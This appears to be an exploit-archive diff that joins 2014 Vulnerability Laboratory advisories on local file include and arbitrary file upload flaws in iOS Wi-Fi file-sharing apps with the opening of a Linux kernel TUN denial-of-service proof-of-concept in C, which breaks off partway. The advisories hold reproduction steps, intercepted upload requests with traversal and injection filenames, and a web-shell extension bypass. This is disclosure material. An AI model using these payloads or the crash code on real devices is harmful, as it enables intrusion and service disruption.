The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `UPLOAD_FILE_TO_FOLDER` (uploadfile) module. Remote attackers are able
to inject own files with malicious `filename` values in the `upload` POST method request to compromise the mobile web-application. The local
file/path include execution occcurs in the index file/folder list context in the vulnerable name/path value. The attacker is able to inject
the local file include request by usage of the available `wifi interface`.
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute
different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to
inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system)
count of 7.0. Exploitation of the local file include web vulnerability requires no privileged web-application user account but low
user interaction. Successful exploitation of the local file include web vulnerability results in mobile application or connected
device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] WiFi Sharing
Vulnerable Module(s):
[+] UPLOAD_FILE_TO_FOLDER
Vulnerable File(s):
[+] uploadfile
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File/Folder Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
The local file/path include web vulnerability can be exploited by local network attackers with low user interaction. For security demonstration or
to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: UPLOAD FILE TO FOLDER
<tbody><tr style="background:#fff;"><td colspan="2" align="left">Current Folder: Document</td></tr><tr style="background:#fff;">
<td colspan="2" align="right"><a href="/UPLOAD_FILE_TO_FOLDER">Uploading files</a> </td></tr><tr><td colspan="2">
<a href="68-2.png" target="_blank"> 68-2.png </a></td></tr><tr><td colspan="2">
<a href="%20./../[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].filetype" target="_blank"> %20./../[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].filetype </a></td></tr>
<tr><td colspan="2"><a href="night-city-pictures-24.jpg" target="_blank"> night-city-pictures-24.jpg </a></td></tr>
</table></div></body>
</html></iframe></a></td></tr></tbody>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/uploadfile Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[-1] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/UPLOAD_FILE_TO_FOLDER]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------189051727528435
Content-Disposition: form-data; name="upload1"; filename="<%20./../[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].filetype"
Content-Type: image/x
Reference(s):
http://localhost:8080/uploadfile
http://localhost:8080/UPLOAD_FILE_TO_FOLDER
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction and parse of the vulnerable filename value in the multi upload module.
Restrict the input name value and encode the name output value in the index listing module to prevent further local file include attacks.
Do not forget to disallow multiple file extensions which could result in the bypass or the filetype validation.
Security Risk:
==============
The security risk of the local file include web vulnerability in the upload to file index module is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

213
platforms/ios/webapps/33631.txt Executable file
View file

@ -0,0 +1,213 @@
Document Title:
===============
AllReader v1.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1269
Release Date:
=============
2014-05-26
Vulnerability Laboratory ID (VL-ID):
====================================
1269
Common Vulnerability Scoring System:
====================================
6.8
Product & Service Introduction:
===============================
Professional helper on your iPhone, iPad, and iPod that will allow you to read virtually any file type right from your device: PDF, DJVU, DOC, XLS, PPT, TXT,
Image, Video files, whether these are important documents, books, student materials, notes or you can just view pictures and video clips.
Supported devices: iPhone 3Gs/4/4S/5, iPod Touch 4/5, all iPad generations.
(Copy of the Homepage: https://itunes.apple.com/us/app/all-reader./id871830567 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official AllReader v1.0 iOS mobile application by Wylsacom Waytt.
Vulnerability Disclosure Timeline:
==================================
2014-05-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wylsacom Waytt
Product: AllReader - iOS Mobile Application 1.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official AllReader v1.0 iOS mobile application by Wylsacom Waytt.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `file upload` module. Remote attackers are able to inject own files with
malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path
execution occcurs in the index file/path dir list context. The attacker is able to inject the malicious file/path include request by usage
of the available `wifi interface`.
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute
different local malicious attacks requests. The attack vector is on the application-side of the allreader wifi service and the request
method to inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count
of 6.8. Exploitation of the local file include web vulnerability requires no privileged web-application user account withoutuser interaction.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] WiFi Transfer UI
Vulnerable Module(s):
[+] Upload File
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File/Folder Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
The local file/path include web vulnerability in the web-server can be exploited by local attackers without auth or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the security vulnerability ...
1. Install the ios application (iphone or ipad)
2. Start it and move to the settings menu, activate the wifi server
3. Go to another computer in the same network and surf to the local web-server url (localhost:8080)
4. Upload a random image
5. Tamper the session information by an intercept, exchange the vulnerable `filename` value with own malicious file or path request
Note: Payloads can be combined with script code to successful execute different other attacks like hijacking, phishing and co.
5. Submit the settings and refresh the file dir index list
6. The code execution occurs in the file dir index list of ios app
7. Successful reproduce of the local fil/path include web vulnerability
PoC: File Dir Index List - http://localhost:8080/
<html><head><title>Files from </title><meta http-equiv="Content-Type" content="text/html;
charset=UTF-8"><style>html {background-color:#eeeeee} body { background-color:#FFFFFF; font-family:Tahoma,Arial,Helvetica,sans-serif;
font-size:18x; margin-left:15%; margin-right:15%; border:3px groove #006600; padding:15px; } </style></head><body><h1>Files from </h1>
<bq>The following files are hosted live from the iPhone's Docs folder.</bq><p><a href="..">..</a><br>
<a href="../.[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY].png"><../.[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].png</a> (0.5 Kb, 2014-05-26 11:49:04 +0000)<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label>
<label><input type="submit" name="button" id="button" value="Submit" /></label></form></body></html></iframe></a></p></body></html>
--- POC SESSION LOGS [POST] ---
Status: 200[OK]
POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[821] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------102203247921326
Content-Disposition: form-data; name="file"; filename="../.[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].png"
Content-Type: image/png
-- RESPONSE HEADER
Status: 200[OK]
GET http://localhost:8080/../.[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[721] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[721]
Date[Mo., 26 Mai 2014 11:49:06 GMT]
Reference(s):
http://localhost:8080/
http://localhost:8080/../x
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerale filename value in the upload module POST method request.
The file dir index list needs to encode malicious filenames even of the input is already parsed to prevent further attacks via file/path value.
Restrict, filter or use a secure exception-handling to disallow special chars, html tags or script codes.
Security Risk:
==============
The security risk of the local file/path include web vulnerability is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

400
platforms/ios/webapps/33632.txt Executable file
View file

@ -0,0 +1,400 @@
Document Title:
===============
Bluetooth Photo-File Share v2.1 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1270
Release Date:
=============
2014-05-30
Vulnerability Laboratory ID (VL-ID):
====================================
1270
Common Vulnerability Scoring System:
====================================
7
Product & Service Introduction:
===============================
This is the best bluetooth sharing and file transfer app in app store. Transfer photo, video, contacts and any file between two
iPhone, iPad and/or iPod Touches over bluetooth connection. Requires iPhone 3G or later or 2nd generation iPod Touch or later.
Does not require any 3G or WiFi connection. Unlike some other bluetooth photo sharing apps only can transfer photo from Photo
Library, The bluetooth share not only can transfer photo, but also it can transfer video from Photo Library.
( Copy of the Homepage: https://itunes.apple.com/de/app/bluetooth-photo-video-musik/id590369016 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Bluetooth Photo/Video /Musik /Contact /File Share v2.1 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-05-30: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Tao Xu
Product: Bluetooth Photo /Video /Musik /Contact /File Share - iOS Mobile Web Application 2.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Bluetooth Photo/Video /Musik /Contact /File Share v2.1 iOS mobile application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to
compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `data upload` module. Remote attackers are able to inject own files with malicious `filename`
values in the `file upload` POST method request to compromise the mobile web-application. The local file/path execution occcurs in the file/path dir index
list web context. The attacker is able to inject the malicious file/path include request by usage of the available `filesharing > wifi-transfer interface`.
Local attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute different local malicious
attacks requests. The attack vector is on the application-side of the allreader wifi service and the request method to inject is POST. The security risk of the
local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.8.
Exploitation of the local file include web vulnerability requires no privileged web-application user account withoutuser interaction.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Filesharing > Wi-fi Transfer UI
Vulnerable Function(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir List (http://localhost:8080/)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Bluetooth Photo/Video /Musik /Contact /File Share v2.1 iOS mobile application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the system validation and compromise the web-server.
The vulnerability is located in the upload file module. Remote attackers are able to upload a php or js web-shells by a rename of the file with multiple extensions
to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension `pentest.png.js.html.php`. After the
upload the attacker needs to open the file in the web application. He deletes the .png file extension and can access the application with elevated access rights.
The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Filesharing > Wi-fi Transfer UI
Vulnerable Function(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Install the mobile application to your apple ios device (iphone/ipad)
2. Open the application locally and activate the wifi transfer & export function
3. Login to another remote device in the same network to the application interface (localhost:8080)
4. Choose a random file to upload, start a session tamper to intercept and press the submit button
5. Change in the POST method request of the upload module the vulnerable filename value
Note: Include for example a local device component file or mobile application path as value
6. Continue the request, refresh the index page and download the local file or request unauthorized the mobile device path
7. Successful reproduce of the local file include web vulnerability!
PoC: Wi-fi Transfer (UI) - Index File Dir Listing
<div class="filetable">
<table border="0" cellpadding="0" cellspacing="0"></table>
<table id="filetable" cellpadding="0" cellspacing="0" width="860px"><thead><tr>
<th class="file">File Name</th><th style="padding-left:15px">File Size</th><th class="actionbutton"></th><th class="actionbutton"></th></tr>
</thead><tbody id="filelist" style="padding-left:15px;">
<tr><td class="file"><a href="/files/./[LOCAL FILE/PATH INCLUDE VULNERABILITY VIA FILENAME VALUE].png" class="file">
<./[LOCAL FILE/PATH INCLUDE VULNERABILITY VIA FILENAME VALUE]">.png</a></td><td class='info'>538.00B</td>
<td class='actionbutton' ><form><input type='button' value='Download'
onClick="window.location.href='/files/./[LOCAL FILE/PATH INCLUDE VULNERABILITY VIA FILENAME VALUE].png'"></form></td>
<td class='actionbutton' ><form action='/files/%3Ciframe%20src=a%3E.png' method='post' ><input name='_method' value='delete' type='hidden'/>
<input name="commit" type="submit" value="Delete" class='button' /></form></td></tr></tbody></table></iframe></a></td></tr></tbody></table>
<br><br></div>
--- POC SESSION LOGS [POST] (LFI) ---
19:32:08.304[128ms][total 128ms] Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------284152263011599
Content-Disposition: form-data; name="newfile"; filename="<iframe src=a>.png"
Content-Type: image/png
-
19:32:09.312[129ms][total 177ms] Status: 200[OK]
GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[61465] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[61465]
Date[Mi., 28 Mai 2014 17:45:38 GMT]
-
19:32:10.023[143ms][total 143ms] Status: 200[OK]
GET http://localhost:8080/files?Wed%20May%2028%202014%2019:32:09%20GMT+0200 Load Flags[LOAD_BACKGROUND ] Gr??e des Inhalts[60] Mime Type[text/plain]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[application/json, text/javascript, */*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[60]
Cache-Control[private, max-age=0, must-revalidate]
Content-Type[text/plain; charset=utf-8]
Date[Mi., 28 Mai 2014 17:45:39 GMT]
-
19:32:10.623[147ms][total 147ms] Status: 200[OK]
GET http://localhost:8080/.././[LOCAL FILE/PATH INCLUDE VULNERABILITY VIA FILENAME VALUE]; Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Mi., 28 Mai 2014 17:45:39 GMT]
Reference(s):
http://localhost:8080/
1.2
The arbitrary file upload web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC:
19:32:11.222[142ms][total 142ms] Status: 200[OK]
GET http://localhost:8080/files/pentest.png.js.html.php
Manual steps to reproduce the vulnerability ...
1. Install the mobile application to your apple ios device (iphone/ipad)
2. Open the application locally and activate the wifi transfer & export function
3. Login to another remote device in the same network to the application interface (localhost:8080)
4. Choose a random file to upload, start a session tamper to intercept and press the submit button
5. Change in the POST method request of the upload the vulnerable filename value
Note: Include a webshell with multiple file extensions (exp. pentest.png.js.html.php.aspx.js.png) to bypass the mobile application filter
6. Upload the file and request after the refresh the following url http://localhost:8080/files/pentest.png.js.html.php.aspx.js.png
Note: To execute the arbitrary code it is required to delete the .png file extensions
7. Successful reproduce of the arbitrary file upload web vulnerability!
--- POC SESSION LOGS [POST] (AFU) ---
19:32:08.304[128ms][total 128ms] Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------284152263011599
Content-Disposition: form-data; name="newfile"; filename="pentest.png.js.html.php.aspx.js.png"
Content-Type: image/png
-
19:32:09.312[129ms][total 177ms] Status: 200[OK]
GET http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[61465] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[61465]
Date[Mi., 28 Mai 2014 17:45:38 GMT]
-
19:32:10.023[143ms][total 143ms] Status: 200[OK]
GET http://localhost:8080/files?Wed%20May%2028%202014%2019:32:09%20GMT+0200 Load Flags[LOAD_BACKGROUND ] Gr??e des Inhalts[60] Mime Type[text/plain]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[application/json, text/javascript, */*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[60]
Cache-Control[private, max-age=0, must-revalidate]
Content-Type[text/plain; charset=utf-8]
Date[Mi., 28 Mai 2014 17:45:39 GMT]
-
19:32:10.623[147ms][total 147ms] Status: 200[OK]
GET http://localhost:8080/pentest.png.js.html.php.aspx.js.png Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Mi., 28 Mai 2014 17:45:39 GMT]
-
19:32:11.222[142ms][total 142ms] Status: 200[OK] GET http://localhost:8080/files/pentest.png.js.html.php
Reference(s):
http://localhost:8080/files/
Solution - Fix & Patch:
=======================
1.1
The file include web vulnerability can be patched by a secure encode and validation of the filename value itself. Parse also the output filename listing in the index module
to prevent further local file/path include attacks.
1.2
Restrict the filename value input by disallow of special chars. Only allow letters and numbers. Proof for multiple file extensions and block/replace them.
use a secure exception-handling or filter mechanism to prevent further arbitrary file upload attacks.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the filename value is estimated as high.
1.2
The security risk of the arbitrary file upload web vulnerability in the wifi web-server ui is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

155
platforms/linux/dos/33635.c Executable file
View file

@ -0,0 +1,155 @@
source: http://www.securityfocus.com/bid/38185/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
/* gcc -std=gnu99 -O2 -g -lpthread -lrt tunload.c -o tunload */
/*****************************************************************************
* Copyright (C) 2008 Remi Denis-Courmont. All rights reserved. *
* *
* Redistribution and use in source and binary forms, with or without *
* modification, are permitted provided that the above copyright notice is *
* retained and/or reproduced in the documentation provided with the *
* distribution. *
* *
* To the extent permitted by law, this software is provided with no *
* express or implied warranties of any kind. *
* The situation as regards scientific and technical know-how at the time *
* when this software was distributed did not enable all possible uses to be *
* tested and verified, nor for the presence of any or all faults to be *
* detected. In this respect, people's attention is drawn to the risks *
* associated with loading, using, modifying and/or developing and *
* reproducing this software. *
* The user shall be responsible for verifying, by any or all means, the *
* software's suitability for its requirements, its due and proper *
* functioning, and for ensuring that it shall not cause damage to either *
* persons or property. *
* *
* The author does not warrant that this software does not infringe any or *
* all intellectual right relating to a patent, a design or a trademark. *
* Moreover, the author shall not hold someone harmless against any or all *
* proceedings for infringement that may be instituted in respect of the *
* use, modification and redistrbution of this software. *
*****************************************************************************/
#define _GNU_SOURCE 1
#include <stdio.h>
#include <string.h>
#include <stdarg.h>
#include <stdlib.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <unistd.h>
#include <netinet/in.h>
#include <linux/if.h>
#include <linux/if_tun.h>
#include <pthread.h>
static void run (const char *fmt, ...)
{
va_list ap;
char *cmd;
va_start (ap, fmt);
vasprintf (&cmd, fmt, ap);
va_end (ap);
system (cmd);
free (cmd);
}
static int tun_open (void)
{
struct ifreq req;
int fd = open ("/dev/net/tun", O_RDWR);
if (fd == -1)
return -1;
memset (&req, 0, sizeof (req));
req.ifr_flags = IFF_TUN;
if (ioctl (fd, TUNSETIFF, &req))
{
(void) close (fd);
return -1;
}
run ("ip link set dev %s up", req.ifr_name);
run ("ip -6 address add fd34:5678:9abc:def0::1/64 dev %s",
req.ifr_name);
return fd;
}
static unsigned rcvd;
static int tun;
static void cleanup_fd (void *data)
{
(void) close ((intptr_t)data);
}
